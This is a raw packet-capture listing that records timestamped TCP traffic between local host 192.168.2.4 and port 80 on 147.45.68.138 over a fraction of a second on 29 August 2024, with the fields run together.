                                                      Aug 29, 2024 22:52:22.522820950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.522844076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.522851944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.522864103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.522872925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.522885084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.522891998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.522912025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.522933960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.522995949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523006916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523016930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523026943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523034096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.523039103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523042917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.523051023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523062944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523072958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523073912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.523086071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523087025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.523098946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523109913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.523137093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.523569107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523580074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523590088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523598909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.523612976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.523642063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524153948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524164915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524175882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524205923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524216890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524301052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524313927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524337053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524338961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524348021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524348021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524363995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524374008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524374008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524385929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524386883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524399996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524409056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524415970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524425983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524432898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524436951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.524446011 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.524471045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.529568911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529581070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529592037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529654980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529665947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529671907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.529676914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529690981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529700041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.529720068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.529746056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.529747009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529759884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529769897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529782057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529793024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529804945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529814959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.529849052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.529872894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.532808065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532819986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532830954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532857895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532857895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.532870054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532877922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.532881975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532892942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532902956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532908916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.532927990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532928944 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.532938957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532948971 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.532949924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.532975912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533000946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533000946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533013105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533024073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533035994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533047915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533058882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533061028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533072948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533082008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533103943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533118010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533179998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533191919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533201933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533216000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533222914 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533229113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.533242941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.533262014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588593960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588689089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588694096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588733912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588743925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588759899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588774920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588783026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588794947 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588809013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588814020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588833094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588845968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588849068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588865042 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588866949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588881016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588881016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588897943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588908911 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588913918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588931084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588932991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588941097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588948011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588956118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588963985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588974953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588979959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.588982105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.588998079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.589009047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.589016914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.589027882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.589032888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.589040041 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.589051008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.589060068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.589090109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.608861923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.608879089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.608892918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.608916998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.608958006 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609108925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609123945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609138012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609150887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609154940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609184027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609191895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609205008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609208107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609225035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609232903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609241009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609256029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609265089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609272003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609287977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609287977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609303951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609312057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609319925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609333038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609337091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609354973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609361887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609370947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609386921 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609390020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.609414101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.609443903 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611411095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611427069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611452103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611460924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611471891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611478090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611494064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611504078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611510992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611510992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611527920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611536026 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611548901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611571074 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611597061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611613035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611628056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611638069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611644983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611644983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611671925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611675024 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611680031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611691952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611706972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611726999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611748934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611752033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611768007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611790895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611807108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611809969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611821890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611829996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611835957 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611840010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611855984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611860991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611871958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611874104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611891031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611891985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611910105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611912012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611922979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611948967 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.611957073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611973047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611989975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.611994028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612006903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.612008095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612019062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612025976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.612042904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.612046003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612056971 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612060070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.612075090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.612083912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612092018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.612103939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612107992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.612112045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612126112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.612131119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612152100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.612169981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620124102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620147943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620168924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620196104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620198011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620217085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620227098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620232105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620249033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620259047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620265007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620275021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620285988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620311975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620321989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620337963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620337963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620353937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620367050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620372057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620374918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620388985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.620395899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620414019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.620430946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621279001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621320009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621409893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621424913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621440887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621448994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621458054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621468067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621481895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621484995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621512890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621515036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621531963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621535063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621548891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621571064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621571064 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621582031 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621592045 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621596098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621613979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621623039 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621637106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621651888 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621668100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621684074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621699095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621709108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621714115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621721983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621730089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621742010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621746063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621761084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.621764898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621783018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.621794939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.622140884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.622183084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.623214960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.623259068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675458908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675477028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675508976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675513983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675524950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675533056 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675540924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675549030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675556898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675568104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675573111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:22.675587893 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675617933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:22.675645113 CEST8049739147.45.68.138192.168.2.4
